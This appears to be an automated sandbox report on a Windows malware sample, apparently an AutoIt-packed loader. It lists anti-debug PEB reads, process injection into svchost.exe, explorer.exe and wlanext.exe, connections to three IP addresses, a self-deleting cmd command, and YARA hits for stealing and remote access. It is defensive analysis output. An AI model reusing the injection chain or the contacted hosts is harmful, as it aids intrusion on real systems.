          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h] | 1_2_02F6CA24
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h] | 1_2_02F5EA2E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h] | 1_2_02FBCA11
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h] | 1_2_02F38BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h] | 1_2_02F38BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h] | 1_2_02F38BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h] | 1_2_02F5EBFC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h] | 1_2_02FBCBF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h] | 1_2_02FDEBD0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h] | 1_2_02F50BCB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h] | 1_2_02F50BCB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h] | 1_2_02F50BCB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h] | 1_2_02F30BCD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h] | 1_2_02F30BCD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h] | 1_2_02F30BCD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h] | 1_2_02F40BBE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h] | 1_2_02F40BBE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h] | 1_2_03004A80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h] | 1_2_02F2CB7E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h] | 1_2_02FC6B40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h] | 1_2_02FC6B40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h] | 1_2_02FFAB40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h] | 1_2_02FD8B42
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h] | 1_2_02F5EB20
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h] | 1_2_02F5EB20
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h] | 1_2_02FF8B28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h] | 1_2_02FF8B28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02FAEB1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] | 1_2_02F6C8F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] | 1_2_02F6C8F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h] | 1_2_02FFA8E4
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h] | 1_2_02F5E8C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h] | 1_2_02FBC89D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h] | 1_2_02F30887
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h] | 1_2_02FBE872
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h] | 1_2_02FBE872
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h] | 1_2_02FC6870
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h] | 1_2_02FC6870
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h] | 1_2_02F60854
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h] | 1_2_02F34859
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h] | 1_2_02F34859
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h] | 1_2_02F42840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] | 1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] | 1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] | 1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h] | 1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] | 1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] | 1_2_02F52835
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h] | 1_2_02F6A830
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h] | 1_2_02FD483A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h] | 1_2_02FD483A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h] | 1_2_02FBC810
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h] | 1_2_02F629F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h] | 1_2_02F629F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h] | 1_2_02FBE9E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F3A9D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h] | 1_2_02F649D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h] | 1_2_02FFA9D3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h] | 1_2_02FC69C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h] | 1_2_02FB89B3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h] | 1_2_02FB89B3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h] | 1_2_02FB89B3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02F429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h] | 1_2_02F309AD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h] | 1_2_02F309AD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h] | 1_2_02FD4978
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h] | 1_2_02FD4978
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h] | 1_2_02FBC97C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h] | 1_2_02F56962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h] | 1_2_02F56962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h] | 1_2_02F56962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h] | 1_2_02F7096E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7096E mov edx, dword ptr fs:[00000030h] | 1_2_02F7096E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h] | 1_2_02F7096E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB0946 mov eax, dword ptr fs:[00000030h] | 1_2_02FB0946
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB892A mov eax, dword ptr fs:[00000030h] | 1_2_02FB892A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC892B mov eax, dword ptr fs:[00000030h] | 1_2_02FC892B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBC912 mov eax, dword ptr fs:[00000030h] | 1_2_02FBC912
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F28918 mov eax, dword ptr fs:[00000030h] | 1_2_02F28918
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F28918 mov eax, dword ptr fs:[00000030h] | 1_2_02F28918
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAE908 mov eax, dword ptr fs:[00000030h] | 1_2_02FAE908
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAE908 mov eax, dword ptr fs:[00000030h] | 1_2_02FAE908
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F68EF5 mov eax, dword ptr fs:[00000030h] | 1_2_02F68EF5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h] | 1_2_02F36EE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h] | 1_2_02F36EE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h] | 1_2_02F36EE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36EE0 mov eax, dword ptr fs:[00000030h] | 1_2_02F36EE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCAEB0 mov eax, dword ptr fs:[00000030h] | 1_2_02FCAEB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCAEB0 mov eax, dword ptr fs:[00000030h] | 1_2_02FCAEB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBCEA0 mov eax, dword ptr fs:[00000030h] | 1_2_02FBCEA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBCEA0 mov eax, dword ptr fs:[00000030h] | 1_2_02FBCEA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBCEA0 mov eax, dword ptr fs:[00000030h] | 1_2_02FBCEA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2AE90 mov eax, dword ptr fs:[00000030h] | 1_2_02F2AE90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2AE90 mov eax, dword ptr fs:[00000030h] | 1_2_02F2AE90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2AE90 mov eax, dword ptr fs:[00000030h] | 1_2_02F2AE90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004F68 mov eax, dword ptr fs:[00000030h] | 1_2_03004F68
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F62E9C mov eax, dword ptr fs:[00000030h] | 1_2_02F62E9C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F62E9C mov ecx, dword ptr fs:[00000030h] | 1_2_02F62E9C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F36E71 mov eax, dword ptr fs:[00000030h] | 1_2_02F36E71
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB0E7F mov eax, dword ptr fs:[00000030h] | 1_2_02FB0E7F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB0E7F mov eax, dword ptr fs:[00000030h] | 1_2_02FB0E7F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB0E7F mov eax, dword ptr fs:[00000030h] | 1_2_02FB0E7F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC6E20 mov eax, dword ptr fs:[00000030h] | 1_2_02FC6E20
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC6E20 mov eax, dword ptr fs:[00000030h] | 1_2_02FC6E20
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC6E20 mov ecx, dword ptr fs:[00000030h] | 1_2_02FC6E20
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004FE7 mov eax, dword ptr fs:[00000030h] | 1_2_03004FE7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F28E1D mov eax, dword ptr fs:[00000030h] | 1_2_02F28E1D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5AE00 mov eax, dword ptr fs:[00000030h] | 1_2_02F5AE00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5AE00 mov eax, dword ptr fs:[00000030h] | 1_2_02F5AE00
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00EFA66C
          Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_00EE81AC
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE8189 SetUnhandledExceptionFilter, | 0_2_00EE8189
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00DE0063 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 4_2_00DE0063
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00DDFD20 SetUnhandledExceptionFilter, | 4_2_00DDFD20

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 45.38.60.47 80
          Source: C:\Windows\explorer.exe | Network Connect: 104.21.40.196 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.252.111.49 80
          Source: C:\Users\user\Desktop\file.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 2580
          Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 3052
          Source: C:\Windows\SysWOW64\svchost.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: DD0000
          Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2373008
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFB106 LogonUserW, | 0_2_00EFB106
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00EC3D19
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0411C SendInput,keybd_event, | 0_2_00F0411C
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F074E7 mouse_event, | 0_2_00F074E7
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00EFA66C
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F071FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, | 0_2_00F071FA
          Source: file.exe, explorer.exe, 00000002.00000000.1666389880.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1660320721.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658671856.00000000018A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.1658671856.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
          Source: file.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
          Source: explorer.exe, 00000002.00000000.1658108503.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2686435138.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000002.00000000.1658671856.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000E.00000002.2919550460.0000000004CFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndI
          Source: explorer.exe, 00000002.00000000.1658671856.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE65C4 cpuid 0_2_00EE65C4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00F1091D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3B340 GetUserNameW,0_2_00F3B340
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EF1E8E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EDDDC0
          Source: file.exe, 00000000.00000003.1644842933.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1644225469.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1645099426.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1645532593.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1645743878.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1643659977.000000000115C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1645459259.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1644652528.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1654895477.000000000118F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1644498449.000000000118F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: file.exe | Binary or memory string: WIN_81
Source: file.exe | Binary or memory string: WIN_XP
Source: file.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: file.exe | Binary or memory string: WIN_XPe
Source: file.exe | Binary or memory string: WIN_VISTA
Source: file.exe | Binary or memory string: WIN_7
Source: file.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
